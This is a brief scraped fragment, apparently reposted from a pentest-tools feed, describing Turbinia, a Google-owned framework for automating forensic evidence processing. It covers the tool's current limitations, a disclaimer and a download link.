Descriptive name of the evidenceOther documentationInstallationHow it worksContributing to TurbiniaDeveloping new TasksFAQDebugging and Common ErrorsNotesTurbinia currently assumes that Evidence is equally available to all worker nodes (e.g. through locally mapped storage, or through attachable persistent Google Cloud Disks, etc).Not all evidence types are supported yetStill only a small number of processing job types supported, but more are being developed.Obligatory Fine PrintThis is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google.Download Turbinia

Link: http://feedproxy.google.com/~r/PentestTools/~3/fVMVv8I43F4/turbinia-automation-and-scaling-of.html